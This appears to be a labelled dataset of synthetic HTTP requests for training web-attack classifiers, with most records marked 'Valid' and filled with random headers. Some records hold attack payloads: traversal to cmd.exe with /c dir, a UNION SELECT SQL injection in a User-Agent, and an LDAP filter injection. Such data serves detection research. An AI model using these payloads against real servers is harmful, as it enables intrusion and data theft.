~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25823
Start - Id: 2616
class: Valid
GET /re3roqinhoOtodsut/wFt.qZ3BS/wsdnsho6ebcsotgwnii/mxQK9A2tzDReO6/7AtNepxv/iEs.Y-x.exe?Jp-t5y=728275&vNZYgt@V=a%28ulat-E&grNR2ih=uUZz8oH&hfwelac8tDChu=07423&oo=aw1GA&nutA6=easixyearS&Uppee=9&7or2GconnectS=iFApXMIC&TwdocumentcE=ses&hj2=ens&rb9NsIt=6560834 HTTP/1.1
Host: www.lell.be
Connection: close
Accept: */*;q=0.7
Accept-Charset: ks_c_5601-1987;q=0.2, x-mac-roman;q=0.1, hz-gb-2312;q=0.4, euc-tw;q=0.7, iso-8859-8-i;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 16.249.92.210
Cookie: 6Ond6atfcre=mailcn<;heNmnq=rihEe)qct;5n8_ZM7tFin=8
Cookie2: $Version="359"
Date: Fri, 18 Dec 09 06:35:57 GMT
ETag: "uxoJCeAN38JF2ZR"
Expect: eorh=hOsit5;eeeed
From: leejhr@sitc4ia.cz
If-Modified-Since: Mon, 03 Oct 05 14:13:10 CET
If-Unmodified-Since: Tue, 06 Jan 04 16:49:33 GMT
If-Match: "oQxo13vngnGuDEy6Z"
If-None-Match: *
If-Range: "31DK_Ef5u7-M2R5O4"
Max-Forwards: 74
MIME-Version: 5.4
Pragma: r=o
Proxy-Authorization: tonpde EEnuou5a=aesdRdtr
Authorization: Digest response="1DF9272156A9CD8aF44AdF7739C8F763"
Range: 358055-4261
Referer: http://www.iwonuvE.it/uNoaLw/DoBlme.htm
TE: trailers,gzip;q=0.2
Trailer: If-Match
User-Agent: Mozilla/4.3 (X11; U; Linux i386 2.1; ci-ia; rv:9.9.2) Gecko/29336218
UA-CPU: 68000
UA-Disp: 5183,3355,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6037x127
Via: 9.1 72.48.195.24, 4.5 178.248.80.207
Transfer-Encoding: identity
Upgrade: riwd/2.7
Warning: 490 www.edeoica.css "irieceeHr1udvocili" "Sat, 01 Apr 06 08:34:39 GMT"
X-Forwarded-For: 35.160.78.10
X-Serial-Number: 0105225738
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2616
Start - Id: 17293
class: Valid
GET /iu9da4em/hVWDUeuu.j0SVF/u9/aSjfHuwn1SI.html?hlEqkmyiOrqa=9925951&Hta2y=kMs0VcGS4NT.&pMzfssbw=tewec&otah=tSrSPA._Mr&dP5YQboot.ini3O-6w0=0608508&kQ_IFkM=+301nvbscript&TRyf4MmochaKrCa9=bH&arhoApoaSn=eEpassthru2m&NpEHsi=4umkoysh7lea&0wZsQ=4%29eu&deiNrirg=geiframe&_r__U=sei&dy=8423015655&Li8@3.Ql=5yelalqgsiheohoge HTTP/1.1
Host: www.i6eargsiah.biz:29384
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: ks_c_5601-1987;q=0.7, iso-8859-8, x-mac-cyrillic, windows-1253;q=0.1
Accept-Encoding: 
Accept-Language: eyr-nc;q=0.4, 6e-ahySn
Cache-Control: hom=eben6eog
Client-ip: 25.163.183.187
Cookie: FrlZhrelerc3m=do6ludrlrw
Cookie2: $Version="635"
Date: Wed, 27 Jun 07 23:41:28 UTC
ETag: "XjZ4NGP2E_4kGeo@jWc"
Expect: bsote=drigdsmd;ehaoop
From: ahipt@bhraulhaa.fr
If-Modified-Since: Wed, 08 Dec 04 08:55:22 GMT
If-Unmodified-Since: Tue, 08 Apr 08 12:27:35 UTC
If-Match: "IPOKnJfSHLGoY.m"
If-None-Match: *
If-Range: Sat, 18 Jul 09 22:48:33 UTC
Max-Forwards: 55
MIME-Version: 0.0
Pragma: is='ueyo5i'
Proxy-Authorization: eEaEe8 ogho=3YTrbs9
Authorization: Digest opaque="ntvfjt0"
Range: -03,4-133137
Referer: http://www.acic.uk/iywhs/rruors/ndhitug/lenchia6/wtot.jsp
TE: chunked,trailers,trailers
Trailer: Pragma
User-Agent: advLzA5F. http://www.saS6.st
UA-CPU: StrongARM
UA-Disp: 7151,7445,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 0027x5589
Via: 4.0 www.rqrar.js
Transfer-Encoding: identity
Upgrade: gnoa/0.3, nree/3.4, 2t3kns/8.8, Fnehon/4.7, kr7scp/0.5
Warning: 819 33.81.58.189:59 "sxjEOamwna" 
X-Forwarded-For: 153.184.197.192
X-Serial-Number: 835471798337
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17293
Start - Id: 44486
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 254.62.42.85
Connection: close
Accept: */*;q=0.2
Accept-Charset: gb2312;q=0.9, x-mac-icelandic;q=0.2, koi8;q=0.1
Accept-Encoding: compress
Accept-Language: na7rsa3-TLt, t-cTwot4rj, n-eD9s;q=0.4, ebsWs5cg-ifI
Cache-Control: no-store
Client-ip: 29.10.71.191
Cookie: epevdnh6Litaerv=dvTdcWBzD;Scruoooo=stoSoaehae1;deTce252ako=oteincludeluRtd0dee>tChmo6
Cookie2: $Version="960"
Date: Wed, 06 May 09 20:11:09 CET
ETag: "iW-oDqyOW0NFzNS1j"
Expect: mnteO
From: cI4oaebh@nrntt4iEtl.fr
If-Modified-Since: Sat, 17 Sep 05 02:12:35 CET
If-Unmodified-Since: Mon, 07 Nov 05 15:48:12 CET
If-Match: *
If-None-Match: "k6l2PoLg45XvUvT"
If-Range: "v-lub7Me1IPbwi8kUN"
Max-Forwards: 056
MIME-Version: 9.7
Pragma: est01a=r
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: Digest qop=auth-int
Range: 83215-
Referer: /oeio/34osi/lmOnen.dll
TE: gzip,trailers
Trailer: Via
User-Agent: yY58o_nD http://www.2zflynt.org
UA-CPU: Sparc
UA-Disp: 970,105,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 949x9593
Via: 9.5 www.ahbdsyg.jpeg, FTP/8.3 www.cgge1.css, HTTP/7.7 209.179.94.120
Transfer-Encoding: compress
Upgrade: et3/3.3, etd8ae/9.5
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 75943929627
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 44486
Start - Id: 25766
class: Valid
GET /ejybnfwdqoeiIn/copy7U/geptta/Uls278mns/ec.php3?tdm=cat%7EeN&hamhSeixn=80789256&ysystemWcXKTGHvHj=92&aTud2nem=CArstml2spetI HTTP/1.1
Host: www.srefAtnOdv.fr
Connection: mtan
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 3-jss8tw0;q=0.0
Cache-Control: no-cache
Client-ip: 193.210.122.211
Cookie: BnetcatXxNro5H=55688;.9rATtUobjectx8zG=3299
Cookie2: $Version="44"
Date: Wed, 21 Apr 10 13:51:44 CET
ETag: W/"Tn3GOjM58@xlTf@7.kl7"
Expect: 100-continue
From: wsit@mwmse.com
If-Modified-Since: Thu, 30 Aug 07 23:06:12 CET
If-Unmodified-Since: Wed, 04 Jun 08 22:24:10 GMT
If-Match: *
If-None-Match: "lUSPS3LP75pmmU7"
If-Range: *
Max-Forwards: 5
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Basic ZlRtYTllaWU6ZTdzcnBvdXQ=
Authorization: Digest qop=auth
Range: 0846-,55-
Referer: http://www.wpgy.org/teeowsch/8o0n1/y5ra/toda.png
TE: trailers
Trailer: Warning
User-Agent: Mozilla/0.5 (Machintosh; U; Mac OS X 0.1; Ei-Nv; rv:3.0.6) Gecko/99719146
UA-CPU: MIPS
UA-Disp: 4510,2608,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 291x574
Via: FTP/5.0 5.222.45.131, 2.5 33.109.79.12, 1.4 206.220.92.195
Transfer-Encoding: deflate
Upgrade: wqn/1.7, nvnp/4.1
Warning: 928 4.71.150.181 "eif2TenhunoLoU" 
X-Forwarded-For: 249.109.166.6
X-Serial-Number: 63082151043081
----: ------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 25766
Start - Id: 11904
class: Valid
GET /bd.cfm? HTTP/1.1
Host: www.wo3gueyu.st
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 141.7.159.107
Cookie: 0ys=ah;aeuasDoha=227433088;ro=9832404;hmd6Coa=1300;valp9Mn=nodesiot7;LYBtL0shutdownkR=a33xtRimtpuR0e
Cookie2: $Version="1"
Date: Sun, 09 Jul 06 24:24:58 GMT
ETag: "MV3voYN9elZ7vVpCFDz"
Expect: meccetko=pati
From: cwtdea@hotshneub.biz
If-Modified-Since: Fri, 12 Mar 04 17:18:17 GMT
If-Unmodified-Since: Mon, 27 Dec 04 21:25:14 GMT
If-Match: "eOyyLJHkyhB4hfSis3b"
If-None-Match: "7q3XaV0xyAbhbT.6"
If-Range: Mon, 13 Jun 05 14:41:10 UTC
Max-Forwards: 0313
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest opaque="ehheia"
Authorization: emel oohcn=ey9uap
Range: 2-,67-8,8-83703
Referer: /rh5apags/idlce/oqis/nzEp.swf
TE: trailers,trailers
Trailer: Via
User-Agent: tt8ros73Us4n8Net
UA-CPU: x86
UA-Disp: 529,350,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 2025x4273
Via: 6ndlex/7.9 183.179.113.71, 2.8 www.pgcrV.jpg, 8.1 www.d2a4.gif
Transfer-Encoding: compress
Upgrade: oail/1.2, webxe/2.0
Warning: 336 www.N0ys.htm:4 "eHsiwTfaeeetyrdoo" 
X-Forwarded-For: 230.225.78.26
X-Serial-Number: 071844089
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11904
Start - Id: 182
class: Valid
GET /pQECMz0_hPC/htiobemAttaadfttoHp/dnkzqoaC/rieeaemtg/sHTt3MoelB/0R_X/7zbClP.exe?aet=027785&a0Gn=o-J7QZcTe&hieehazhoCi=4&JOAUDnhNE_t=eeomtdAs&aienleatpztm=35565&ca=ubxwOs%40UM-be&v0hsztsl=09&isEisia0U6bea=Dnaa3na6mYf&tSnedh6=02952&nnatheIpf=iP9Oq HTTP/1.0
Host: www.eorm.it
Connection: coepS0
Accept: */*
Accept-Charset: iso-8859-4
Accept-Encoding: 
Accept-Language: Olgheh9h-sdhenb1;q=0.7
Cache-Control: max-stale=1
Client-ip: 57.232.136.172
Cookie: LOm9Zxp_Id= ettsn[taieaiupdate
Cookie2: $Version="125"
Date: Tue, 24 Jul 07 20:35:37 UTC
ETag: "2B4t5ua5UDySS27d"
Expect: 100-continue
From: dcet@elLtesue.uk
If-Modified-Since: Fri, 17 Oct 08 24:27:08 GMT
If-Unmodified-Since: Mon, 08 May 06 07:01:58 UTC
If-Match: *
If-None-Match: "Rz0mWLrC543VbZZY1"
If-Range: "IYWh9biMjGt@TNxG"
Max-Forwards: 1
MIME-Version: 7.5
Pragma: ot81tA='mwwonets'
Proxy-Authorization: NTLM cmd0Y3MxbmhuZXJCaWZsbmRyZTY5bWV5b2hjRmgzZ25hVWk4anRkd0dlVGhldA==
Authorization: dl4ix bebge=antcnb
Range: 534828-
Referer: /tcee/m6nm/reflqs/mEw1.txt
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/5.2 (X11; U; Solaris 1.5; ha-aE; rv:1.1.3) Gecko/17805960
UA-CPU: MIPS
UA-Disp: 1257,262,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7281x9184
Via: 6.6 65.105.37.76:80, FTP/0.4 www.e9tsn.css, FTP/3.4 230.80.90.208
Transfer-Encoding: gzip
Upgrade: ahei/7.4, ea4eeh/0.5, diptss/4.0, ensoe3/8.3
Warning: 367 www.lqnT2.htm "rqtcera" 
X-Forwarded-For: 59.243.237.238
X-Serial-Number: 3449007851195603
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 182
Start - Id: 28116
class: Valid
GET /o4PYed5-0P5X0/UzYxuSXUz-h3Aboot.ini/ndeeoprairm/9xmC/atwade0nhcaWalt/nGCJ9x/e9/ueilrbtInWm3an/dz6kKzXXbkHqfswUVhEQ.php?ocstHtt=olikete&adminshvtTIEscript=oboylvWu6huN&bhewoa8oLmheR=9969&liDuaif=-&pstnully-idHH-in7Q=71137&slvvjb=i+47m+qo&ebno5iao=ex5like3w%7Cvee&Bt=s2bErt&crqCag=%28ME%28&ikqjlsueA9ag=Oeriqa0ai&tscoTSr=ehyaInh4Rs&9mtiB0=sg%40+lge7eolc&8i3rdfuss=111598 HTTP/1.0
Host: 214.138.255.154
Connection: nlhdn
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 9ybsov-y, Esve-shglae, nfc-aeeotn;q=0.8, SpUIaue-i;q=0.1, epmprbo-lpsvsf;q=0.4
Cache-Control: max-stale
Client-ip: 219.78.190.9
Cookie: hsr=2650680;acmstyle6XLDTo=88800762
Cookie2: $Version="0"
Date: Fri, 31 Oct 08 22:34:03 UTC
ETag: W/"iHQda_C-FUBqOY_S"
Expect: 100-continue
From: pnlav3j@ifnra.biz
If-Modified-Since: Mon, 29 May 06 08:44:13 CET
If-Unmodified-Since: Sat, 26 Feb 05 09:27:08 CET
If-Match: "jrLBYu1L_JoWJnNK2M"
If-None-Match: *
If-Range: Wed, 11 May 05 01:09:17 CET
Max-Forwards: 1024
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: Basic ZWV5ZW5kOlJIdGRlZWU=
Authorization: omam6o mneshru=rhce
Range: 0-
Referer: http://www.aIoF.biz/einl/nhqoenc/r9zzti/a6enukhe.jpg
TE: chunked;q=0.8,trailers
Trailer: Connection
User-Agent: iHahaxa (eUDHomS; cxMTWVI9N; h2B36b5; 4ROq_e8g)
UA-CPU: Sparc
UA-Disp: 166,4722,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4261x691
Via: 8.4 www.0atA.gif, scte9/7.7 www.iitneao.gif:6104, 1.1 40.25.149.58:208
Transfer-Encoding: dtFt5; 1raisi=f1eoa
Upgrade: laa/1.4
Warning: 810 www.cq0i.htm "twdSte9atJriluetrna" 
X-Forwarded-For: 184.51.223.21
X-Serial-Number: 3455337535861229
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28116
Start - Id: 38634
class: LdapInjection
GET /ofdG7WOWyDNfs/seLpoteaewuAhafee.php?8xejo=nudkOY4Iz7L&ansdya2rr=+eupdatetmpsUg&eBE=ij2eoiordwtlk&D8ZoZNZ1=5100&edootoy=%29+%28++++%7C%28nzf%3Dwl*%29&xpedoaep=08&oaimkgp=32791319&webaech5nasoo=9BUYRY2khN&oii2ie5ef=to5szuNoDLy&sEb=3&_wWVJHioformNI=%26%3Bresdryeimeta8%40l9 HTTP/1.0
Host: 55.206.69.193
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.9, windows-1250;q=0.4, windows-1250;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 208.123.158.22
Cookie: rireee5ehalr=0132;mr=sXKXyXKia2QE
Cookie2: $Version="882"
Date: Thu, 01 Feb 07 24:25:56 GMT
ETag: W/"vITvz6y6nZ8bl.S"
Expect: 100-continue
From: snRe@zteSps5r.net
If-Modified-Since: Thu, 04 Jun 09 06:47:30 GMT
If-Unmodified-Since: Tue, 30 Dec 08 07:41:44 UTC
If-Match: "-BvHRjm7@GtoREvJO"
If-None-Match: "69-mZHCTnhnLPODUQ"
If-Range: *
Max-Forwards: 2832
MIME-Version: 8.5
Pragma: 9l3b='l16tnr'
Proxy-Authorization: NTLM dGRrNTRlNG5ubG1kSGxuZXpzRW90ZWZkdHMydXlnbHJkc3I3bndHb2V5aGU=
Authorization: NTLM dWVFZWNnN1NlZVVlcE1oaUxpVHR5bWVxdG9SaWVsYUxvcm5zbjRlcmN6dG4=
Range: 25834-,48-325537
Referer: http://www.niwr.cz/n2oi.mpeg
TE: gzip;q=0.8
Trailer: If-Modified-Since
User-Agent: Mozilla/0.0 (Windows; U; WinNT 8.1; Gd-gb; rv:8.9.8) Gecko/24270032
UA-CPU: MIPS
UA-Disp: 397,637,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 601x4009
Via: HTTP/7.0 19.18.247.233
Transfer-Encoding: identity
Upgrade: ehlec/7.4, tt07/0.9, ls7e/0.7
Warning: 873 www.crqmw.shtml "oisUjyPexehaoceb" "Mon, 12 Nov 07 06:17:25 UTC"
X-Forwarded-For: 72.129.37.147
X-Serial-Number: 53440991
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38634
Start - Id: 19706
class: Valid
GET /leenn/tdsoitPas8ocfed/wYTYRW/oobnacb5oghusmda.jpeg?Epceel1awlfe=hmsxp_nLt4&aohrwmobRoyrzf=427074083&yseoe4bemn=hyeoU5mMxnG9&4musliaxle1o2ir=%2Fgr&mgeN=nmat&n9raafl=replaceB&z6tsbt=u%40KDAtoVTa HTTP/1.1
Host: 227.218.128.139:80
Connection: keep-alive
Accept: video/quicktime, audio/x-wav;q=0.7
Accept-Charset: x-mac-cyrillic, windows-1258;q=0.0
Accept-Encoding: 
Accept-Language: n-aeeAe;q=0.5
Cache-Control: no-cache
Client-ip: 52.150.165.228
Cookie: aggeahoatt=s8lsraei9%pK;systemdTcgRo=59011;ttolny=2;npevrNe0if=betweenle
Cookie2: $Version="56"
Date: Sat, 26 Aug 06 21:05:09 CET
ETag: W/"OZYuALpI03b7894yF"
Expect: fdiilg8w=edrG;f5aumn=ssr7ms
From: moea@estmzx.uk
If-Modified-Since: Sat, 31 Oct 09 07:40:50 CET
If-Unmodified-Since: Fri, 30 Oct 09 07:14:34 UTC
If-Match: "RpoFUwFtEvhikeFHjp"
If-None-Match: "lZtu6xdASRFJEqGQ"
If-Range: Sun, 05 Jun 05 10:21:32 UTC
Max-Forwards: 90
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: grtfh vrAnop=rgtpedIg
Authorization: NTLM aWRocnJobGxkcmFzb3BnZnVzSXpuaWZ6dGxyZDhlZzBQY21hN3Nv
Range: 4-
Referer: http://www.esrio.ch/sheoaO/shtn.cfm
TE: chunked;q=0.7
Trailer: Date
User-Agent: hzSacnEeuEoe
UA-CPU: PowerPC
UA-Disp: 2543,113,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 947x1810
Via: 1.9 www.M4O4fsn.shtml:0708
Transfer-Encoding: compress
Upgrade: 2eglrr/4.5, A52ic/9.9, ntnlr/5.9, lahWl/8.7
Warning: 409 239.183.137.136 "kwybnsisahj2Sco" "Sun, 04 Dec 05 21:19:44 UTC"
X-Forwarded-For: 209.213.51.4
X-Serial-Number: 7592797493312
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 19706
Start - Id: 7269
class: Valid
PUT /Bd/Lth2k4a9/BQm/560d06ccmdQU3iframeexec6W/f9ne3dutii.gif? HTTP/1.0
Content-Length: 49
Content-Language: aayrR,TEw,rahem
Content-Encoding: compress
Content-Location: http://Ixryieod.be/0rtla/3hbyht/oleeN/eiromb/heedn.exe
Content-MD5: c3p0ZHlvbXJ1bm1sdDN0bw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 14 Dec 05 20:17:54 GMT
Last-Modified: Sun, 03 May 09 06:17:19 GMT
Host: 106.34.114.115
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: e-rjed3z;q=0.3, e-daarf;q=0.6, hfyie-nn
Cache-Control: no-cache
Client-ip: 35.74.208.224
Cookie: 7rFQn3s=smiwdg74j9e9mlA6g;ih610=2874435033;duSsl=2RqTGQ.Kmj;tuzirle5i5sU=ei<i';2JOrTzhmlJn=rreE< rscriptasn
Cookie2: $Version="42"
Date: Mon, 11 Apr 05 11:15:05 UTC
ETag: "wSfFLTbIzpT6.IJV"
Expect: 100-continue
From: gm0jsa@ehox0yd.cz
If-Modified-Since: Mon, 15 Jun 09 07:25:51 GMT
If-Unmodified-Since: Sun, 27 May 07 07:53:22 CET
If-Match: "hTXOLJzqaB@PrRWnk"
If-None-Match: "YpwKkuPSc88-t54aS"
If-Range: Wed, 19 Mar 08 14:14:14 GMT
Max-Forwards: 9
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: ntsAjG eRoonit=huowas9
Authorization: Basic ZWhvYTplaTBvaGdzcg==
Range: 11821-7543,537100-25,4-
Referer: /iebnur2u/Ilerii/roven/ojtnzto.jsp
TE: trailers
Trailer: If-Modified-Since
User-Agent: ernc8u/4.7.0.4.2
UA-CPU: StrongARM
UA-Disp: 6402,121,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 629x010
Via: trna/2.0 www.weokimgs.gif, 7wf/8.7 www.oinervz.css
Transfer-Encoding: srnir7; s0ay=I1s7ett
Upgrade: 1tvot/8.2, om0aAe/7.9
Warning: 186 www.gmebs.png "esStnnrsoitbtaiej" "Mon, 02 Apr 07 11:43:42 GMT"
X-Forwarded-For: 213.154.127.217
X-Serial-Number: 35067124458
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

thH=79346&em=42077&mw=5c?nar aeuxeshutdown8n=

End - Id: 7269
Start - Id: 43841
class: OsCommanding
GET /PBServer/..��../..��../..��../winnt/system32/cmd.exe?/c+dir+c:0 HTTP/1.1
Host: 253.207.131.173
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: euc-kr, x-mac-hebrew;q=0.8, iso-8859-7, windows-874, windows-1255
Accept-Encoding: 
Accept-Language: ina4ah-dAu;q=0.3, ib-reSenovo;q=0.1, yeiunl-ih;q=0.5, oat-eal;q=0.6, vfwX-ireouwn
Cache-Control: ix8=ehkyeue
Client-ip: 34.114.34.166
Cookie: JfGmailrcpuSXH=e3ZAPZorJJ;mtnteautqe=2650582907;04ev=pn3i1of;fr=naaionfetsi
Cookie2: $Version="8"
Date: Fri, 16 Sep 05 08:47:19 UTC
ETag: "OgRXfIiZpYzKNFJj"
Expect: psttrke5
From: nxa0tn0@Cododus.net
If-Modified-Since: Tue, 27 Jan 09 24:06:23 CET
If-Unmodified-Since: Fri, 19 Jun 09 13:22:59 UTC
If-Match: "irp1IvVnJAT7@cT"
If-None-Match: "huLhkN8ZOfTwqzaX"
If-Range: Tue, 13 Mar 07 02:44:46 CET
Max-Forwards: 4923
MIME-Version: 1.4
Pragma: aeriel='oyet9ss'
Proxy-Authorization: Digest uri=/Ieiete.jpg
Authorization: Basic YXJvbmU6Y3QwdHRv
Range: 653-,494-99921,2-094773
Referer: http://oibet.biz/iFaLcoeh/m2ti/Fdrt.css
TE: trailers
Trailer: Accept
User-Agent: Mozilla/1.8 (Machintosh; U; PPC 2.0; lg-oo; rv:7.7.2) Gecko/33738275
UA-CPU: PowerPC
UA-Disp: 431,094,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 6925x167
Via: 1.6 74.172.49.164:14
Transfer-Encoding: eoshG
Upgrade: hnohEn/1.3, he2eEw/1.1, bncL/6.8, m2jzg/1.9, jtxSa/2.3
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43841
Start - Id: 18391
class: Valid
GET /bgnfeesdmli/oeariratnn/6rcTats3c/muOWhtp4w.s_NRngQ3/team1laeihm/lAEmetaBrGRB-group bytq.mspx? HTTP/1.0
Host: 169.21.165.20
Connection: lx6h
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: compress, identity, compress, gzip;q=0.4
Accept-Language: *
Cache-Control: max-stale
Client-ip: 50.134.94.108
Cookie: hsPb3LOfG=eaa;ozifSZxmllocationCa0=ercpno;igg=44969579;8nt7heogrntedab=leNitso9pue5u
Cookie2: $Version="8"
Date: Tue, 14 Dec 04 20:46:55 GMT
ETag: W/"DFGyG11.7FB0Cd_awC"
Expect: EfneoyEr=tvoeeato
From: riig0g@lptIii.ch
If-Modified-Since: Sun, 30 Jan 05 03:50:31 CET
If-Unmodified-Since: Tue, 21 Sep 04 17:47:56 GMT
If-Match: "LjYPyQnW5CSoEhL"
If-None-Match: *
If-Range: "MotH1zEVU4lCBdYBHv"
Max-Forwards: 689
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Basic YXNob2lvZTplSG1h
Authorization: Basic bGF0dDppZWJubw==
Range: -1,77209-
Referer: /rnereTb/eent/Ggereio/elyr/rj9no5ws.tar
TE: chunked,trailers,deflate;q=0.5
Trailer: Cache-Control
User-Agent: 5Mf3xFe@ http://www.rjnFnem.de
UA-CPU: x86
UA-Disp: 0207,859,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 705x273
Via: vprxt/9.0 223.8.220.144, 6.3 www.cAaao4te.htm, 1.6 54.21.134.26
Transfer-Encoding: compress
Upgrade: pto1de/0.8, qne/9.3, atwl/8.8
Warning: 233 131.132.144.191 "OnEdmsatmalecc2jI" "Sat, 10 Jun 06 22:22:26 UTC"
X-Forwarded-For: 185.28.190.254
X-Serial-Number: 9325860267416944126
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18391
Start - Id: 41249
class: SqlInjection
GET /tCcYaw8eTU-FfcEQt/cysW0w04/betgm.png?iln=ed%3Cty&mg8=8767837236&s6roh=5 HTTP/1.0
Host: 25.204.215.106:49
Connection: 4tyf
Accept: text/xml, text/*
Accept-Charset: iso-8859-9;q=0.4, cp-950, windows-1250, koi8
Accept-Encoding: *;q=0.1
Accept-Language: i-una;q=0.1, Vcnoyt2-rh, ianog-9blu054;q=0.1, oeoneR8-iio4Umm;q=0.6
Cache-Control: max-age=689
Client-ip: 156.64.250.125
Cookie: efhrcNrei0vc=cy8snce;ehn7map=45583;atgmt=254;eeeE=nlsd25Pt;oseimsHt=28552
Cookie2: $Version="05"
Date: Sun, 21 Sep 08 24:17:15 UTC
ETag: W/"iJ7h13wGZRPbRSRL4VwO"
Expect: 100-continue
From: YipHgse@Wh0aus.de
If-Modified-Since: Fri, 01 Oct 04 11:42:27 UTC
If-Unmodified-Since: Fri, 21 Jul 06 19:29:02 UTC
If-Match: "dDkviAB7vacA@7Np"
If-None-Match: "9ot@EsXAGipBvI@F"
If-Range: Fri, 31 Mar 06 09:07:26 GMT
Max-Forwards: 3
MIME-Version: 4.7
Pragma: d='Ioemim'
Proxy-Authorization: Digest nc=Bba58bDA
Authorization: Basic cnNhRW5uZWQ6ZGg4ZA==
Range: 377941-4452
Referer: /zcrui/aanatn/a78Ucn.mp3
TE: trailers,trailers,chunked;q=0.4
Trailer: Warning
User-Agent: '   union     select   @@version,1,1,1--
UA-CPU: 68000
UA-Disp: 9585,9750,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 921x845
Via: huna0/1.7 182.191.133.226
Transfer-Encoding: identity
Upgrade: tno/0.7, leolp/4.5, ixwe/8.3
Warning: 092 www.sRueG.htm:35899 "atSmsu2feBlep0ass3" "Fri, 30 Jun 06 18:47:30 CET"
X-Forwarded-For: 119.121.155.105
X-Serial-Number: 48880057053
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41249
Start - Id: 10693
class: Valid
GET /fa/eH/ekFJqOY6F5-@N2H/wqwdItgRP-vVg0_Vuo/dne6sW5LaPgn./pY_updateNkgsystem3D/8pXconnectperlEnuL2oM/ueaE1Sfn1se6nk/tQYeIhAFI/lepdeWfeuz/ui1.exe?n4e4olipqr79=91587&passthruNyQTh=Nrso3RGeyH&tjthh=aeiblo96iee&5w4pubodyJNYnetcatB3=Lkkertt&p4sm=05&gGdnNmni4oeeot=iframe4+lfssopasswd%2Fconnect&hOex7w=91368 HTTP/1.1
Host: www.crtedte.gov:01203
Connection: close
Accept: text/*, image/png;q=0.8, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 245.69.51.123
Cookie: bsthcu=ixtermwitrraitofMfe;u0mde9eN=67057;navalauaMe6t=7015168;5v37setqhemaPn=191;6thTexn=je4ktlcwamOeze;seaxoedteErc=193786
Cookie2: $Version="845"
Date: Fri, 09 Jan 04 24:37:58 CET
ETag: "NsmVkiQ23C9NTA@.zmx9"
Expect: 100-continue
From: spyi@hEtfsnh.ch
If-Modified-Since: Fri, 03 Apr 09 20:36:27 CET
If-Unmodified-Since: Sat, 18 Aug 07 20:34:05 UTC
If-Match: *
If-None-Match: "K-2phcN5XOsORF985yFN"
If-Range: *
Max-Forwards: 607
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Basic YW5uTnNhYzp3c2Vvd3Nz
Authorization: NTLM bnc2b2x0YU5hc2hubnRnbnRsdE90b2RoNHJzbG9vZWJ6dzJh
Range: 569080-9470,36135-,7-
Referer: http://www.elDnop.fr/nOecfy/nfyri.avi
TE: trailers
Trailer: Accept-Language
User-Agent: tMqQ9Di http://www.dbeUic.it
UA-CPU: 68000
UA-Disp: 8769,6775,32
